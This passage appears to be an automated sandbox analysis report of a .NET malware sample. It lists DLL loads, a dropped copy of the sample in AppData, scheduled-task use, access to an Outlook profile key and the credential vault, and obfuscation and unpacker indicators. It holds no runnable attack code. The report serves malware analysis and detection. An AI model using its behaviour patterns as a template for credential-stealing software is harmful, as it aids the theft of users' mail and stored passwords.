          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: mscoree.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: dwrite.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: windowscodecs.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: amsi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: iconcodecservice.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: textshaping.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: propsys.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: edputil.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: appresolver.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: bcp47langs.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: slc.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: sppc.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: mscoree.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: wbemcomn.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: amsi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: sxs.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: edputil.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: vaultcli.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: scrrun.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: ntmarta.dll
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeSection loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, BqKGVR3k2PVtU8wwGi.cs.Net Code: EkQs5pqjWq System.Reflection.Assembly.Load(byte[])
          Source: 0.2.file.exe.7c80000.8.raw.unpack, BqKGVR3k2PVtU8wwGi.cs.Net Code: EkQs5pqjWq System.Reflection.Assembly.Load(byte[])
          Source: 0.2.file.exe.4176818.3.raw.unpack, B.cs.Net Code: A System.Reflection.Assembly.Load(byte[])
          Source: 0.2.file.exe.4099970.5.raw.unpack, B.cs.Net Code: A System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0759E18A push eax; retf 0_2_0759E1A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0759F8E0 push edi; iretd 0_2_0759F8E6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0778AE70 pushfd ; iretd 0_2_0778AE71
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0B9BB468 pushfd ; iretd 0_2_0B9BB469
          Source: C:\Users\user\Desktop\file.exeCode function: 12_2_016B2908 pushfd ; ret 12_2_016B2909
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B773C pushad ; retf 13_2_076B7752
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B871B push ecx; retf 13_2_076B872E
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B82B0 push ecx; retf 13_2_076B82BE
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B812C pushad ; retf 13_2_076B8136
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076BE18B push eax; retf 13_2_076BE1A9
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B790B push ecx; retf 13_2_076B7927
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B89E2 push ecx; retf 13_2_076B89EE
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076BF8E0 push edi; iretd 13_2_076BF8E6
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_076B88BA push ecx; retf 13_2_076B88C6
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_07796A10 push ecx; retf 13_2_07796A1E
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 13_2_077969D7 push ecx; retf 13_2_07796A1E
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E352AF push edi; retn 0000h16_2_00E352B1
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_00E82908 pushfd ; ret 16_2_00E82909
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeCode function: 16_2_0636001A push es; ret 16_2_0636001C
          Source: file.exeStatic PE information: section name: .text entropy: 7.669180420192158
          Source: NnXVkDOvj.exe.0.drStatic PE information: section name: .text entropy: 7.669180420192158
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, T6R2XDpv77JAE94xtg.csHigh entropy of concatenated method names: 'R4a04gRGiq', 'p7m0CespT7', 'bLd0p5J8tt', 'lo90urVjHB', 'Nej0op1QcO', 'oM10nWdOSN', 'xS20XoaRlk', 'MQr0xtd47k', 'THu0t3e42E', 'AiV0UEeeAm'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, bIZl41jTq39Z3ypmRD.csHigh entropy of concatenated method names: 'IJeR1lDqEX', 'fZvRBOeOxA', 'Rx2vnbeOoP', 'oAsvXg4ApJ', 'vBgvxxOnCk', 'jnFvt7DMPL', 'FoPvUyDTTE', 'XaIvZKpLPL', 'qLsvAN2tY3', 'k1pv4slwDV'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, VOscdqPPgMnIinioFi.csHigh entropy of concatenated method names: 'dLpl9XaY2F', 'ElVlDAtGXr', 'jjnlW5GoTo', 'caEloZDdZo', 'wAmlXcEA3e', 'Yh5lx6Lo30', 'DPwlUGsOhX', 'v5jlZkfYJQ', 'g0Rl4Drw7p', 'lFxl8Z6Xf6'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, JLnArkmkhm5iKZ96KE.csHigh entropy of concatenated method names: 'ToString', 'VJsK8yiIBK', 'R65KobM3L8', 'eREKnrjaxl', 'QL4KXIl9EL', 'e1cKxr6rca', 'ifYKtJk8fJ', 'tSPKUXTnBo', 'TYpKZuT3M4', 'Cx0KAygWIU'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, HJdMyIsLI0JDPM1XEd.csHigh entropy of concatenated method names: 'wKHyFSlvcL', 'iiSy3wxSZ6', 'gjXyNtS8FN', 'ADbyOeeIZl', 'bpmy0RDGZH', 'DguyK6xAej', 'y6DUxiSSY1tyP7wM0g', 'UbhbqsXCNtFcJhDvc9', 'yCZyy5UPkc', 'rphyIb9Sr1'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, Iv5gZqDjXtS8FN1Dbe.csHigh entropy of concatenated method names: 'M5mvMkTVCI', 'irvvHSwO8l', 'VGrv97DU1g', 'lXBvD6k1p3', 'RGNv0wDeOJ', 'vOuvKTmXF8', 'Hvsvkng0lX', 'iQhvcH9Gwx', 'pDJvTBcUVx', 'N2RvENrc2L'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, BqKGVR3k2PVtU8wwGi.csHigh entropy of concatenated method names: 'RJmIQD7Xpg', 'vyLIYywW2h', 'uX8IqrwUQ4', 'KinIv314v6', 'iIrIR05bZ6', 'HXCI2MUC1c', 'yFLIFAmuDf', 'LqPI31v0mX', 'KEaIfhj4ZB', 'UVHINA0kFW'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, uAUblPbA0oeE9UjS3G.csHigh entropy of concatenated method names: 'Ejsk75y4XO', 'sy0kVq7tKN', 'i9Bcr3nnQG', 'pXGcyXPu1H', 'HaTk8U5YxB', 'uPukCgUWOW', 'FYrkPtPSoI', 'afDkpYxRWa', 'BU8kuRXGVP', 'sEVkm9xTKv'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, hRcrlZAFKLddya1Mtw.csHigh entropy of concatenated method names: 'Eu5Faeis5n', 'gp8FLNrDL8', 'Kd3F53Kc3K', 'EUJFMdbhCG', 'LvWF1qW9Hf', 'a9sFHPf0tF', 'uY9FBLpmZ6', 'DNwF9iaBce', 'fvnFDbYt7M', 'EXcFjGdH53'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, NV8yME6ChnEJARudpA.csHigh entropy of concatenated method names: 'UL3TWGlv6L', 'lucTofU551', 'I4iTnO6ecF', 'GWKTXe6YAA', 'jr4TxVBo50', 'KhcTtK6dNr', 'oH7TU0pnJo', 'EKkTZTHGnr', 'zVRTAMg5VM', 'C0QT4lgxsn'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, tY5HjqzKN8uxJt6NbB.csHigh entropy of concatenated method names: 'E30EHYTJhy', 'WFoE9M0cHt', 'LfkEDqGhbl', 'XHyEWdnWFh', 'RcAEoeW4sg', 'teZEXZpmIO', 'lngExCH42J', 'Jd1EinoflZ', 'AWqEaHinhQ', 'V1NELhvQSv'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, upsOjYyeo2gSAjhgBF2.csHigh entropy of concatenated method names: 'ToString', 'yPLG9iK9CD', 've6GDUoMe4', 'hGaGj1fCkq', 'ePvGWxCxWT', 'eG6GoTGUu5', 'SsGGnDrL02', 'I6TGXOUylu', 'AwYLOZ2XoIQHYTMAcy3', 'gHX7Hy2olh96g1XIeNC'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, G7dFsEUlYlLEsyWBft.csHigh entropy of concatenated method names: 'LSDFYnvURj', 'oCVFvolKII', 'A5tF2skBda', 'l5x2Vp8V1c', 'gbS2zngkXZ', 'Po7FrnNF7x', 'b54FysCSLE', 'olJFex5Wtp', 'cYYFIoMVnQ', 'K6vFs8vQJr'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, FXZ8IUehT0bSEZaXbH.csHigh entropy of concatenated method names: 'BX65X3BKL', 'B5BMa7gjT', 'o2lH0TExL', 'kqIBmVsrG', 'm4wDeL4IF', 'MS8j2YU5J', 'nvmxXKP74YPghMhS3s', 'gEeeyl8AXcrKOBnlql', 'h6DcbhxMn', 'rcuEykXVs'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, frjggDwnjhsjq9SM5G.csHigh entropy of concatenated method names: 'CNukNhMqOr', 'TDmkO7wV4P', 'ToString', 'oaIkYbPoJ2', 'NfPkqbS47R', 'MvnkvkE2Ug', 'OGrkRTnJRk', 'xCHk2mg9TI', 'hQ1kFjZWJO', 'dU8k3xpIVB'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, MSWwGCgfWPrfAnRWBH.csHigh entropy of concatenated method names: 'NfaT0FOPQN', 'KdmTkSiJYd', 'WcETTw61T3', 'KAiTGaNKY1', 'KCPThTybEA', 'pf5TinoeIQ', 'Dispose', 'g08cYpQk5C', 'N31cqP2p2K', 'WcMcvKh1hD'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, k7B0l3yy8f4Is3A51Bv.csHigh entropy of concatenated method names: 'h0OEVP2TPV', 'UqREzayych', 'c8EGrbPlI2', 'wccGyqejIF', 'uUHGeOplnZ', 'SBUGIl3JnK', 'qreGs9Q3j2', 'X5wGQQeVlR', 'uWNGYx01ar', 'LETGquZSNI'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, SwoZNhysK5gPXNhHbP8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hreJTqq0Pr', 'gv8JE8hd5y', 'BlrJGAN15h', 'PhGJJyO6N5', 'XtFJhbCugj', 'RMNJSXcmQu', 'gTRJiuXaOa'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, X3CaVTVayapPsW3c2W.csHigh entropy of concatenated method names: 'XLUEvyC6sa', 'llvERkL6X7', 'xIvE2r49D4', 'x1eEFdRMg0', 'KUuETHb7rv', 'W9KE3H2yQr', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, CSlvcL92iSwxSZ6lOu.csHigh entropy of concatenated method names: 'VQTqpS4eDN', 'kh5quB4gkt', 'ygXqmGooUb', 'sX2qwyLZHp', 'iyoqdIP4Ay', 'PPXqbbD2cx', 'yD2qgE1Y4X', 'Wxbq7I7pwk', 'pTUq6PiN5G', 'xHwqV2K76J'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, tZH9guW6xAejPDioPK.csHigh entropy of concatenated method names: 'Qte2QHZbPt', 'kCA2qTjhfu', 'B9c2ROqTTr', 'UsK2FGDy6p', 'bIQ237jYwo', 'u1sRdgBoCQ', 'pVVRbLAw2k', 'kWVRgNN3tw', 'WNJR75ONCr', 'staR6Xk1HL'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, DhF5wXyrQ6UCuGgapu7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zZkE8FOk8b', 'HNvECXNbhD', 'r3AEPXyhu6', 'YfDEpR1DsP', 'gawEubqEmQ', 'kSVEms5mKq', 'FyHEw2xOud'
          Source: 0.2.file.exe.42f05f8.4.raw.unpack, ytmCkKqcA2Y2Rc1bOB.csHigh entropy of concatenated method names: 'Dispose', 'Qrfy6AnRWB', 'vNieojG4PK', 'j53yAN9J2P', 'BhIyVY96Mj', 'Os3yzGRQth', 'ProcessDialogKey', 'bq4erV8yME', 'PhneyEJARu', 'UpAee73CaV'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, T6R2XDpv77JAE94xtg.csHigh entropy of concatenated method names: 'R4a04gRGiq', 'p7m0CespT7', 'bLd0p5J8tt', 'lo90urVjHB', 'Nej0op1QcO', 'oM10nWdOSN', 'xS20XoaRlk', 'MQr0xtd47k', 'THu0t3e42E', 'AiV0UEeeAm'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, bIZl41jTq39Z3ypmRD.csHigh entropy of concatenated method names: 'IJeR1lDqEX', 'fZvRBOeOxA', 'Rx2vnbeOoP', 'oAsvXg4ApJ', 'vBgvxxOnCk', 'jnFvt7DMPL', 'FoPvUyDTTE', 'XaIvZKpLPL', 'qLsvAN2tY3', 'k1pv4slwDV'
